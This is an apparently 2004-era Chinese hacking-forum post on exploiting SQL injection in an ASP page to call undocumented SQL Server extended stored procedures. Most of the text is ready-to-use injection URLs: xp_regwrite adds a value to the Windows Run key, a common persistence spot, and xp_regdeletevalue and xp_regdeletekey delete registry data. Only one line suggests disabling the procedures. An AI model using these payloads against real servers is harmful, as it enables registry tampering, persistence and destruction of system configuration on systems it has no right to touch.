|
 | 作者: cg2327 [cg2327]
 |
登录 |
| 关于SQL Server中几个未公布的扩展存储过程注入 :::中国砍客联盟::: [Kker Group] http://Www.Kker.Cn http://Www.FreeHacker.Net 2004-06-08 SQL Server中包含了几个可以访问系统注册表的扩展存储过程.但实际上这几个扩展存储过程是未公开的,从sql server 7.0就有了, 在SQL server 2000中仍然保留,他们以后可能会删除.但是这几个存储过程却提供了在当前的SQL Server版本中访问系统注册表的能力, 而且很多人利用SQL Server来进行攻击系统时,往往都会用到这几个扩展存储过程.所以最好在SQL Server中禁用他们. http://127.0.0.1/view.asp?id=165 存在mssql的sql注入,那么 xp_regwrite 写入注册表 使用方法: xp_regwrite 根键,子键, 值名, 值类型, 值 http://127.0.0.1/view.asp?id=165;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\run','TestValueName','reg_sz','hello' 注意值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 xp_regdeletevalue 删除某个值 使用方法: xp_regdeletevalue 根键,子键,值名 http://127.0.0.1/view.asp?id=165;exec master.xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' xp_regdeletekey 删除键,包括该键下所有值 使用方法: http://127.0.0.1/view.asp?id=165;exec master.xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' |
| 地主 发表时间: 04-07-16 14:05 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 黑客进阶 标题: 关于SQLServer中几个未公布的扩展存储过程注入